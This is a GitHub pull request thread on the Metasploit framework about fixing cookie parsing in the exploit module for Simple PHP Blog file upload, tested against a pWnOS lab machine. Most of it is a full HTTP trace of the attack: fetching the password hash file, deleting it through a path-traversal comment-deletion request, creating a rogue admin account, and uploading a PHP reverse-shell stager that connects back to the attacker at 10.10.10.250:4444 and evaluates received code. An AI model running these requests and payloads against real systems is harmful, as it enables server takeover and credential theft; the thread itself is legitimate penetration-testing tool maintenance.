Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Corrected headers check for retrieved cookie #14442

Merged
merged 2 commits into from
Dec 3, 2020
Merged

Corrected headers check for retrieved cookie #14442

merged 2 commits into from
Dec 3, 2020

Conversation

justinopatrny
Copy link
Contributor

Previous get_cookies method not working properly.

This pull corrects a non-functioning cookie verification in the sphpblog_file_upload exploit.

Bug: (#14441)

Verification

List the steps needed to make sure this thing works

Start Kali with updated Metasploit, add NIC assigned to 10.10.10.250/24
Start pWnOS v2.0 (already hardcoded as 10.10.10.100)

  • Start msfconsole
  • use exploit/unix/webapp/sphpblog_file_upload
  • set rhosts 10.10.10.100
  • set uri /blog
  • set lhost 10.10.10.250
  • exploit

This should trigger a successful exploit:

msf6 exploit(unix/webapp/sphpblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.10.250:4444 
[*] Successfully retrieved hash: $1$gJEbDRbd$5mYGKYmViq/IcU/M9Mdza1
[*] Successfully removed /config/password.txt
[*] Successfully created temporary account.
[*] Successfully logged in as QErwYO:2MsbV2
[*] Successfully retrieved cookie: 5ciq80flifo4kdt2lfmniqokj7
[*] Successfully uploaded bHMPBcr8mUgjeQnD0G2m.php
[*] Successfully uploaded zAQfEXaTovTJORZDxKvh.php
[*] Successfully reset original password hash.
[*] Successfully removed /images/bHMPBcr8mUgjeQnD0G2m.php
[*] Calling payload: /images/zAQfEXaTovTJORZDxKvh.php
[*] Sending stage (39282 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.10.250:4444 -> 10.10.10.100:57843) at 2020-11-28 12:02:05 -0600
[*] Successfully removed /images/zAQfEXaTovTJORZDxKvh.php

@justinopatrny
Corrected headers check for retrieved cookie
c200a27 
Previous get_cookies method not working properly
@bcoles
Copy link
Contributor

bcoles commented Nov 30, 2020

The tests failed due to accessing res.headers['Set-Cookie'] directly:

[*] Running msftidy.rb in ./.git/hooks/post-merge mode

--- Checking new and changed module syntax with tools/dev/msftidy.rb ---

modules/exploits/unix/webapp/sphpblog_file_upload.rb:116 - [WARNING] Do not read Set-Cookie header directly, use res.get_cookies instead: if (res.headers['Set-Cookie'] =~ /my_id=(.*)/)

res.get_cookies is the preferred approach. It is strange that this is not working.

If there's a bug in res.get_cookies then there's a more pressing issue here. Hard to say without seeing the HTTP headers.

Can you run again with set HttpTrace true and paste the output?

@justinopatrny
Copy link
Contributor Author

Here is the output:

[*] Started reverse TCP handler on 10.10.10.250:4444 
####################
# Request:
####################
GET /blog/config/password.txt HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
                                                                                      
                                                                                      
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
Last-Modified: Mon, 05 Oct 2020 09:28:03 GMT                                          
ETag: "3fe8f-22-5b0e91960ac24"                                                        
Accept-Ranges: bytes                                                                  
Content-Length: 34                                                                    
Vary: Accept-Encoding                                                                 
Content-Type: text/plain                                                              
X-Pad: avoid browser bug                                                              
                                                                                      
$1$W9NTrm2S$RYFqwt0tVFOOrvaS5/8ek.                                                    
[+] Successfully retrieved hash: $1$W9NTrm2S$RYFqwt0tVFOOrvaS5/8ek.
####################
# Request:
####################
GET /blog/comment_delete_cgi.php?y=05&m=08&comment=./config/password.txt HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
                                                                                      
                                                                                      
####################
# Response:
####################
HTTP/1.1 302 Found
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
X-Powered-By: PHP/5.3.5-1ubuntu7                                                      
Location: http://10.10.10.100/blog/comments.php?y=05&m=08&entry=                      
Vary: Accept-Encoding                                                                 
Content-Length: 0                                                                     
Content-Type: text/html                                                               
X-Pad: avoid browser bug                                                              
                                                                                      
                                                                                      
[+] Successfully removed /config/password.txt
####################
# Request:
####################
POST /blog/install03_cgi.php HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
Content-Type: application/x-www-form-urlencoded                                       
Content-Length: 23                                                                    
                                                                                      
user=1phEpO&pass=8Wbh1w                                                               
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
X-Powered-By: PHP/5.3.5-1ubuntu7                                                      
Set-Cookie: PHPSESSID=7869n2gpoto3nbd2pa3pgb18q3; path=/, my_id=7869n2gpoto3nbd2pa3pgb18q3                                                                                  
Expires: Thu, 19 Nov 1981 08:52:00 GMT                                                
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0         
Pragma: no-cache                                                                      
Vary: Accept-Encoding                                                                 
Content-Length: 5780                                                                  
Content-Type: text/html                                                               
                                                                                      
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"                        
        "http://www.w3.org/TR/html4/loose.dtd">                                       
<html>                                                                                
<head>                                                                                
        <meta http-equiv='Content-Type' content='text/html; charset=ISO-8859-1'>      
        <link rel=stylesheet type="text/css" href="themes/default/style.css">         
        <style type="text/css">body { background-color: #CCCC99; color: #666633; }#header { border-color: #4D4D45; color: #FFFFFF; background-color: #999966; }#footer { color: #666666; background: #EEEEEE; border-top: 1px solid #4D4D45; }h1, h2, h3, h4, h5, h6 { color: #666633; }#blog_subject { color: #666633; }#blog_date { color: #999999; }a:link, a:visited { color: #993333; }a:hover { color: #FF3333; }a:active { color: #3333FF; }</style>   <script language="JavaScript" src="scripts/sb_javascript.js"></script>
        <title>No Title - Create Username &amp; Password</title>                      
</head>                                                                               
                <body leftmargin="0" topmargin="0" marginheight="0" marginwidth="0">  
                        <br />                                                        
                        <table border="0" width="700" cellspacing="0" cellpadding="0" align="center" style="border: 1px solid #4D4D45; border-top: 8px solid #4D4D45;">     
                                <tr align="left" valign="top">                        
                                        <td width="700" colspan="2" bgcolor="#999966">
                                                <div id="header">                     
                                                        No Title                     </div>                                                                                 
                                                <div id="pagebody">                   
                                                        <table border="0" width="700" cellspacing="0" cellpadding="0" align="left">                                         
                                                                <tr valign="top">     
                                                                        <td width="450" bgcolor="#FFFFFF">                                                                  
                                                                                <div id="maincontent">                                                                      
                                                                                     <h2>Congratulations!</h2>You are now logged in. Click below to visit the Setup page, where you can name your blog. Happy blogging!<p /><a href="setup.php?blog_language=english">[ Setup ]</a><br /><br />                                                        </div>                                                                                 
                                                                        </td>         
                                                                        <td width="250" bgcolor="#F2F2F2" style="border-left: 1px solid #D9D9D9;">                          
                                                                                <div id="sidebar">                                                                          
                                                                                     Links<br /><a href="index.php">Home</a><br /><a href="contact.php">Contact Me</a><br /><a href="stats.php">Stats</a><br /><a href="add_link.php">[ + link ]</a><br /><hr noshade size="1" color=#D9D9D9><a href="set_login.php">Change Login</a><br /><a href="logout.php">Logout</a><hr noshade size="1" color=#D9D9D9>Archives<br />                   
                <table border="0" cellpadding="0" cellspacing="5" align="center">     
                <tr>                                                                  
                <td align="center"><a href="/blog/install03_cgi.php?y=20&m=09">&laquo;</a></td>                                                                             
                <td align="center" colspan="5"><b>October 2020</b></td>               
                <td align="center"><a href="/blog/install03_cgi.php?y=20&m=11">&raquo;</a></td>                                                                             
                </tr>                                                                 
                <tr><td>Sun</td><td>Mon</td><td>Tue</td><td>Wed</td><td>Thu</td><td>Fri</td><td>Sat</td></tr><tr><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td align="center">1</td><td align="center">2</td><td align="center">3</td></tr><tr><td align="center">4</td><td align="center">5</td><td align="center">6</td><td align="center">7</td><td align="center">8</td><td align="center">9</td><td align="center">10</td></tr><tr><td align="center">11</td><td align="center">12</td><td align="center">13</td><td align="center">14</td><td align="center">15</td><td align="center">16</td><td align="center">17</td></tr><tr><td align="center">18</td><td align="center">19</td><td align="center">20</td><td align="center">21</td><td align="center">22</td><td align="center">23</td><td align="center">24</td></tr><tr><td align="center">25</td><td align="center">26</td><td align="center">27</td><td align="center">28</td><td align="center">29</td><td align="center">30</td><td align="center">31</td></tr><tr><td></td><td></td><td></td><td></td><td></td><td></td><td></td></tr></table><hr noshade size="1" color=#D9D9D9>Search:<br /><form method=get action="search.php"><input type="text" size="16" name="q">&nbsp;<input type="submit" value="Go"></form><hr noshade size="1" color=#D9D9D9>Menu<br /><a href="add.php">Add Entry</a><br /><a href="add_static.php">Add Static Page</a><br /><a href="upload_img.php">Upload Image</a><hr noshade size="1" color=#D9D9D9>Preferences<br /><a href="categories.php">Categories</a><br /><a href="add_block.php">Blocks</a><br /><a href="setup.php">Preferences</a><br /><a href="themes.php">Themes</a><br /><a href="colors.php">Colors</a><br /><a href="options.php">Date &amp; Time</a><br /><a href="info.php">Meta Tags</a><br /><hr noshade size="1" color=#D9D9D9>Most Recent Entries<br /><a href="http://10.10.10.100/blog/index.php?entry=entry110509-191340">New Blog!</a><br /><hr noshade size="1" color=#D9D9D9><div align="center"><a href="http://sourceforge.net/projects/sphpblog/"><img style="margin-bottom: 5px;" src="interface/button_sphpblog.png" alt="Powered by Simple PHP Blog 0.4.0" title="Powered by Simple PHP Blog 0.4.0" border="0"></a><br /><a href="rss.php"><img style="margin-bottom: 5px;" src="interface/button_rss20.png" alt="Get RSS 2.0 Feed" title="Get RSS 2.0 Feed" border="0"></a><br /><a href="atom.php"><img style="margin-bottom: 5px;" src="interface/button_atom03.png" alt="Get Atom 0.3 Feed" title="Get Atom 0.3 Feed" border="0"></a><br /><a href="rdf.php"><img style="margin-bottom: 5px;" src="interface/button_rdf10.png" alt="Get RDF 1.0 Feed" title="Get RDF 1.0 Feed" border="0"></a><br /><a href="http://php.net/"><img style="margin-bottom: 5px;" src="interface/button_php.png" alt="Powered by PHP 5.3.5-1ubuntu7" title="Powered by PHP 5.3.5-1ubuntu7" border="0"></a><br /><img style="margin-bottom: 5px;" src="interface/button_txt.png" alt="Powered by Plain text files" title="Powered by Plain text files" border="0"><br /></div>         </div>                                                                                 
                                                                        </td>         
                                                                </tr>                 
                                                                <tr align="left" valign="top">                                                                              
                                                                        <td width="700" colspan="2">                                                                        
                                                                                <div id="footer">No Footer - Page Generated in 0.0204 seconds</div>                         
                                                                        </td>         
                                                                </tr>                 
                                                        </table>                      
                                                </div>                                
                                        </td>                                         
                                </tr>                                                 
                        </table>                                                      
                        <br />                                                        
                </body>                                                               
                </html>                                                               
                                                                                      
[+] Successfully created temporary account.
####################
# Request:
####################
POST /blog/login_cgi.php HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
Content-Type: application/x-www-form-urlencoded                                       
Content-Length: 23                                                                    
                                                                                      
user=1phEpO&pass=8Wbh1w                                                               
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
X-Powered-By: PHP/5.3.5-1ubuntu7                                                      
Set-Cookie: PHPSESSID=t2tga51b05no8drb0ku3pjri84; path=/, my_id=t2tga51b05no8drb0ku3pjri84                                                                                  
Expires: Thu, 19 Nov 1981 08:52:00 GMT                                                
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0         
Pragma: no-cache                                                                      
Vary: Accept-Encoding                                                                 
Content-Length: 5649                                                                  
Content-Type: text/html                                                               
                                                                                      
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"                        
        "http://www.w3.org/TR/html4/loose.dtd">                                       
<html>                                                                                
<head>                                                                                
        <meta http-equiv='Content-Type' content='text/html; charset=ISO-8859-1'>      
        <link rel=stylesheet type="text/css" href="themes/default/style.css">         
        <style type="text/css">body { background-color: #CCCC99; color: #666633; }#header { border-color: #4D4D45; color: #FFFFFF; background-color: #999966; }#footer { color: #666666; background: #EEEEEE; border-top: 1px solid #4D4D45; }h1, h2, h3, h4, h5, h6 { color: #666633; }#blog_subject { color: #666633; }#blog_date { color: #999999; }a:link, a:visited { color: #993333; }a:hover { color: #FF3333; }a:active { color: #3333FF; }</style>   <script language="JavaScript" src="scripts/sb_javascript.js"></script>
        <title>No Title - Login</title>                                               
</head>                                                                               
                <body leftmargin="0" topmargin="0" marginheight="0" marginwidth="0">  
                        <br />                                                        
                        <table border="0" width="700" cellspacing="0" cellpadding="0" align="center" style="border: 1px solid #4D4D45; border-top: 8px solid #4D4D45;">     
                                <tr align="left" valign="top">                        
                                        <td width="700" colspan="2" bgcolor="#999966">
                                                <div id="header">                     
                                                        No Title                     </div>                                                                                 
                                                <div id="pagebody">                   
                                                        <table border="0" width="700" cellspacing="0" cellpadding="0" align="left">                                         
                                                                <tr valign="top">     
                                                                        <td width="450" bgcolor="#FFFFFF">                                                                  
                                                                                <div id="maincontent">                                                                      
                                                                                     <h2>Success!</h2>You are now logged in. Happy blogging!<p /><a href="index.php">Return to Home</a><br />                                                                    </div>                                                                                 
                                                                        </td>         
                                                                        <td width="250" bgcolor="#F2F2F2" style="border-left: 1px solid #D9D9D9;">                          
                                                                                <div id="sidebar">                                                                          
                                                                                     Links<br /><a href="index.php">Home</a><br /><a href="contact.php">Contact Me</a><br /><a href="stats.php">Stats</a><br /><a href="add_link.php">[ + link ]</a><br /><hr noshade size="1" color=#D9D9D9><a href="set_login.php">Change Login</a><br /><a href="logout.php">Logout</a><hr noshade size="1" color=#D9D9D9>Archives<br />                   
                <table border="0" cellpadding="0" cellspacing="5" align="center">     
                <tr>                                                                  
                <td align="center"><a href="/blog/login_cgi.php?y=20&m=09">&laquo;</a></td>                                                                                 
                <td align="center" colspan="5"><b>October 2020</b></td>               
                <td align="center"><a href="/blog/login_cgi.php?y=20&m=11">&raquo;</a></td>                                                                                 
                </tr>                                                                 
                <tr><td>Sun</td><td>Mon</td><td>Tue</td><td>Wed</td><td>Thu</td><td>Fri</td><td>Sat</td></tr><tr><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td align="center">1</td><td align="center">2</td><td align="center">3</td></tr><tr><td align="center">4</td><td align="center">5</td><td align="center">6</td><td align="center">7</td><td align="center">8</td><td align="center">9</td><td align="center">10</td></tr><tr><td align="center">11</td><td align="center">12</td><td align="center">13</td><td align="center">14</td><td align="center">15</td><td align="center">16</td><td align="center">17</td></tr><tr><td align="center">18</td><td align="center">19</td><td align="center">20</td><td align="center">21</td><td align="center">22</td><td align="center">23</td><td align="center">24</td></tr><tr><td align="center">25</td><td align="center">26</td><td align="center">27</td><td align="center">28</td><td align="center">29</td><td align="center">30</td><td align="center">31</td></tr><tr><td></td><td></td><td></td><td></td><td></td><td></td><td></td></tr></table><hr noshade size="1" color=#D9D9D9>Search:<br /><form method=get action="search.php"><input type="text" size="16" name="q">&nbsp;<input type="submit" value="Go"></form><hr noshade size="1" color=#D9D9D9>Menu<br /><a href="add.php">Add Entry</a><br /><a href="add_static.php">Add Static Page</a><br /><a href="upload_img.php">Upload Image</a><hr noshade size="1" color=#D9D9D9>Preferences<br /><a href="categories.php">Categories</a><br /><a href="add_block.php">Blocks</a><br /><a href="setup.php">Preferences</a><br /><a href="themes.php">Themes</a><br /><a href="colors.php">Colors</a><br /><a href="options.php">Date &amp; Time</a><br /><a href="info.php">Meta Tags</a><br /><hr noshade size="1" color=#D9D9D9>Most Recent Entries<br /><a href="http://10.10.10.100/blog/index.php?entry=entry110509-191340">New Blog!</a><br /><hr noshade size="1" color=#D9D9D9><div align="center"><a href="http://sourceforge.net/projects/sphpblog/"><img style="margin-bottom: 5px;" src="interface/button_sphpblog.png" alt="Powered by Simple PHP Blog 0.4.0" title="Powered by Simple PHP Blog 0.4.0" border="0"></a><br /><a href="rss.php"><img style="margin-bottom: 5px;" src="interface/button_rss20.png" alt="Get RSS 2.0 Feed" title="Get RSS 2.0 Feed" border="0"></a><br /><a href="atom.php"><img style="margin-bottom: 5px;" src="interface/button_atom03.png" alt="Get Atom 0.3 Feed" title="Get Atom 0.3 Feed" border="0"></a><br /><a href="rdf.php"><img style="margin-bottom: 5px;" src="interface/button_rdf10.png" alt="Get RDF 1.0 Feed" title="Get RDF 1.0 Feed" border="0"></a><br /><a href="http://php.net/"><img style="margin-bottom: 5px;" src="interface/button_php.png" alt="Powered by PHP 5.3.5-1ubuntu7" title="Powered by PHP 5.3.5-1ubuntu7" border="0"></a><br /><img style="margin-bottom: 5px;" src="interface/button_txt.png" alt="Powered by Plain text files" title="Powered by Plain text files" border="0"><br /></div>         </div>                                                                                 
                                                                        </td>         
                                                                </tr>                 
                                                                <tr align="left" valign="top">                                                                              
                                                                        <td width="700" colspan="2">                                                                        
                                                                                <div id="footer">No Footer - Page Generated in 0.0088 seconds</div>                         
                                                                        </td>         
                                                                </tr>                 
                                                        </table>                      
                                                </div>                                
                                        </td>                                         
                                </tr>                                                 
                        </table>                                                      
                        <br />                                                        
                </body>                                                               
                </html>                                                               
                                                                                      
[+] Successfully logged in as 1phEpO:8Wbh1w
[-] Error retrieving cookie!
####################
# Request:
####################
POST /blog/upload_img_cgi.php HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
Content-Type: multipart/form-data; boundary=foC9JD                                    
Content-Length: 265                                                                   
Cookie: my_id=[-] Error retrieving cookie!                                            
; PHPSESSID=[-] Error retrieving cookie!


--foC9JD
Content-Disposition: form-data; name="userfile"; filename="BHyPjh2RrdgNoeYjsM4K.php"
Content-Type: text/plain


    <?php $hash = $_POST['hash'];
    $fp = fopen("../config/password.txt","w");
    fwrite($fp,$hash);
    fpclose($fp);
    ?>
--foC9JD--
####################
# Response:
####################
HTTP/1.1 400 Bad Request
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
Vary: Accept-Encoding                                                                 
Content-Length: 430                                                                   
Connection: close                                                                     
Content-Type: text/html; charset=iso-8859-1                                           
                                                                                      
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">                                    
<html><head>                                                                          
<title>400 Bad Request</title>                                                        
</head><body>                                                                         
<h1>Bad Request</h1>                                                                  
<p>Your browser sent a request that this server could not understand.<br />           
Request header field is missing ':' separator.<br />                                  
<pre>                                                                                 
; PHPSESSID=[-] Error retrieving cookie!</pre>                                        
</p>
<hr>
<address>Apache/2.2.17 (Ubuntu) Server at web.corp.ISIntS.com Port 80</address>
</body></html>

[+] Successfully Uploaded BHyPjh2RrdgNoeYjsM4K.php
####################
# Request:
####################
POST /blog/upload_img_cgi.php HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
Content-Type: multipart/form-data; boundary=06WpVM                                    
Content-Length: 1257                                                                  
Cookie: my_id=[-] Error retrieving cookie!                                            
; PHPSESSID=[-] Error retrieving cookie!


--06WpVM
Content-Disposition: form-data; name="userfile"; filename="pzlA2Y0MqB2Do2huxCNC.php"
Content-Type: text/plain

<?php /*<?php /**/ error_reporting(0); $ip = '10.10.10.250'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();?>
--06WpVM--
####################
# Response:
####################
HTTP/1.1 400 Bad Request
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
Vary: Accept-Encoding                                                                 
Content-Length: 430                                                                   
Connection: close                                                                     
Content-Type: text/html; charset=iso-8859-1                                           
                                                                                      
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">                                    
<html><head>                                                                          
<title>400 Bad Request</title>                                                        
</head><body>                                                                         
<h1>Bad Request</h1>                                                                  
<p>Your browser sent a request that this server could not understand.<br />           
Request header field is missing ':' separator.<br />                                  
<pre>                                                                                 
; PHPSESSID=[-] Error retrieving cookie!</pre>                                        
</p>
<hr>
<address>Apache/2.2.17 (Ubuntu) Server at web.corp.ISIntS.com Port 80</address>
</body></html>

[+] Successfully Uploaded pzlA2Y0MqB2Do2huxCNC.php
####################
# Request:
####################
POST /blog/images/BHyPjh2RrdgNoeYjsM4K.php HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
Content-Type: application/x-www-form-urlencoded                                       
Content-Length: 39                                                                    
                                                                                      
hash=$1$W9NTrm2S$RYFqwt0tVFOOrvaS5/8ek.                                               
####################
# Response:
####################
HTTP/1.1 404 Not Found
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
Vary: Accept-Encoding                                                                 
Content-Length: 312                                                                   
Content-Type: text/html; charset=iso-8859-1                                           
                                                                                      
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">                                    
<html><head>                                                                          
<title>404 Not Found</title>                                                          
</head><body>                                                                         
<h1>Not Found</h1>                                                                    
<p>The requested URL /blog/images/BHyPjh2RrdgNoeYjsM4K.php was not found on this server.</p>                                                                                
<hr>                                                                                  
<address>Apache/2.2.17 (Ubuntu) Server at 10.10.10.100 Port 80</address>              
</body></html>                                                                        
                                                                                      
[+] Successfully reset original password hash.
####################
# Request:
####################
GET /blog/comment_delete_cgi.php?y=05&m=08&comment=./images/BHyPjh2RrdgNoeYjsM4K.php HTTP/1.1                                                                               
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
                                                                                      
                                                                                      
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
X-Powered-By: PHP/5.3.5-1ubuntu7                                                      
Vary: Accept-Encoding                                                                 
Content-Length: 1752                                                                  
Content-Type: text/html                                                               
                                                                                      
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"                        
        "http://www.w3.org/TR/html4/loose.dtd">                                       
<html>                                                                                
<head>                                                                                
        <meta http-equiv='Content-Type' content='text/html; charset=ISO-8859-1'>      
        <link rel=stylesheet type="text/css" href="themes/default/style.css">         
        <style type="text/css">body { background-color: #CCCC99; color: #666633; }#header { border-color: #4D4D45; color: #FFFFFF; background-color: #999966; }#footer { color: #666666; background: #EEEEEE; border-top: 1px solid #4D4D45; }h1, h2, h3, h4, h5, h6 { color: #666633; }#blog_subject { color: #666633; }#blog_date { color: #999999; }a:link, a:visited { color: #993333; }a:hover { color: #FF3333; }a:active { color: #3333FF; }</style>   <script language="JavaScript" src="scripts/sb_javascript.js"></script>
        <title>No Title - Comments</title>                                            
</head>                                                                               
                <body leftmargin="0" topmargin="0" marginheight="0" marginwidth="0">  
                        <br />                                                        
                        <table border="0" width="450" cellspacing="0" cellpadding="0" align="center" style="border: 1px solid #4D4D45; border-top: 8px solid #4D4D45;">     
                                <tr align="left" valign="top">                        
                                        <td width="450" bgcolor="#999966">            
                                                <div id="header">                     
                                                        No Title<br />                
                                                </div>                                
                                        </td>                                         
                                </tr>                                                 
                                <tr align="left" valign="top">                        
                                        <td width="450" bgcolor="#FFFFFF">            
                                                <div id="maincontent">                
                                                        <h2>Whoops!</h2>Comment not deleted. I ran into a problem while deleting your comment.<br /><br />Server Reported:<br /><p /><a href="index.php">Return to Home</a><br /><br />                          </div>                                                                                 
                                        </td>                                         
                                </tr>                                                 
                                <tr align="left" valign="top">                        
                                        <td width="450">                              
                                                <div id="footer">No Footer - Page Generated in 0.006 seconds</div>                                                          
                                        </td>                                         
                                </tr>                                                 
                        </table>                                                      
                        <br />                                                        
                </body>                                                               
                </html>                                                               
                                                                                      
[+] Successfully removed /images/BHyPjh2RrdgNoeYjsM4K.php
[*] Calling payload: /images/pzlA2Y0MqB2Do2huxCNC.php
####################
# Request:
####################
GET /blog/images/pzlA2Y0MqB2Do2huxCNC.php HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
                                                                                      
                                                                                      
####################
# Response:
####################
HTTP/1.1 404 Not Found
Date: Mon, 05 Oct 2020 11:37:57 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
Vary: Accept-Encoding                                                                 
Content-Length: 312                                                                   
Content-Type: text/html; charset=iso-8859-1                                           
                                                                                      
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">                                    
<html><head>                                                                          
<title>404 Not Found</title>                                                          
</head><body>                                                                         
<h1>Not Found</h1>                                                                    
<p>The requested URL /blog/images/pzlA2Y0MqB2Do2huxCNC.php was not found on this server.</p>                                                                                
<hr>                                                                                  
<address>Apache/2.2.17 (Ubuntu) Server at 10.10.10.100 Port 80</address>              
</body></html>                                                                        
                                                                                      
####################
# Request:
####################
GET /blog/comment_delete_cgi.php?y=05&m=08&comment=./images/pzlA2Y0MqB2Do2huxCNC.php HTTP/1.1                                                                               
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
                                                                                      
                                                                                      
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 05 Oct 2020 11:37:58 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
X-Powered-By: PHP/5.3.5-1ubuntu7                                                      
Vary: Accept-Encoding                                                                 
Content-Length: 1753                                                                  
Content-Type: text/html                                                               
                                                                                      
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"                        
        "http://www.w3.org/TR/html4/loose.dtd">                                       
<html>                                                                                
<head>                                                                                
        <meta http-equiv='Content-Type' content='text/html; charset=ISO-8859-1'>      
        <link rel=stylesheet type="text/css" href="themes/default/style.css">         
        <style type="text/css">body { background-color: #CCCC99; color: #666633; }#header { border-color: #4D4D45; color: #FFFFFF; background-color: #999966; }#footer { color: #666666; background: #EEEEEE; border-top: 1px solid #4D4D45; }h1, h2, h3, h4, h5, h6 { color: #666633; }#blog_subject { color: #666633; }#blog_date { color: #999999; }a:link, a:visited { color: #993333; }a:hover { color: #FF3333; }a:active { color: #3333FF; }</style>   <script language="JavaScript" src="scripts/sb_javascript.js"></script>
        <title>No Title - Comments</title>                                            
</head>                                                                               
                <body leftmargin="0" topmargin="0" marginheight="0" marginwidth="0">  
                        <br />                                                        
                        <table border="0" width="450" cellspacing="0" cellpadding="0" align="center" style="border: 1px solid #4D4D45; border-top: 8px solid #4D4D45;">     
                                <tr align="left" valign="top">                        
                                        <td width="450" bgcolor="#999966">            
                                                <div id="header">                     
                                                        No Title<br />                
                                                </div>                                
                                        </td>                                         
                                </tr>                                                 
                                <tr align="left" valign="top">                        
                                        <td width="450" bgcolor="#FFFFFF">            
                                                <div id="maincontent">                
                                                        <h2>Whoops!</h2>Comment not deleted. I ran into a problem while deleting your comment.<br /><br />Server Reported:<br /><p /><a href="index.php">Return to Home</a><br /><br />                          </div>                                                                                 
                                        </td>                                         
                                </tr>                                                 
                                <tr align="left" valign="top">                        
                                        <td width="450">                              
                                                <div id="footer">No Footer - Page Generated in 0.0145 seconds</div>                                                         
                                        </td>                                         
                                </tr>                                                 
                        </table>                                                      
                        <br />                                                        
                </body>                                                               
                </html>                                                               
                                                                                      
[+] Successfully removed /images/pzlA2Y0MqB2Do2huxCNC.php
[*] Exploit completed, but no session was created.

@bcoles
Copy link
Contributor

bcoles commented Nov 30, 2020 

Set-Cookie: PHPSESSID=7869n2gpoto3nbd2pa3pgb18q3; path=/, my_id=7869n2gpoto3nbd2pa3pgb18q3

lol

What does res.get_cookies think the cookies are?

Can you throw puts res.get_cookies.inspect in before the cookie check and paste the output?

It looks like the cookie value is used for both the my_id and PHPSESSID cookie throughout the module.

my_id=#{session}; PHPSESSID=#{session}

If the output of res.get_cookies is reasonable, then there's probably a cleaner and easier way to keep both the tests and the module happy.

Also this module is kind of a mess and is inline with current design and style standards. It could do with some cleanup.

@justinopatrny
Copy link
Contributor Author

Here you go:

msf6 exploit(unix/webapp/sphpblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.10.250:4444 
[+] Successfully retrieved hash: $1$qmJBhAiQ$svVcAJqX0gNhlX.iCpY4o0
[+] Successfully removed /config/password.txt
[+] Successfully created temporary account.
[+] Successfully logged in as CCBBiy:GXGLyD
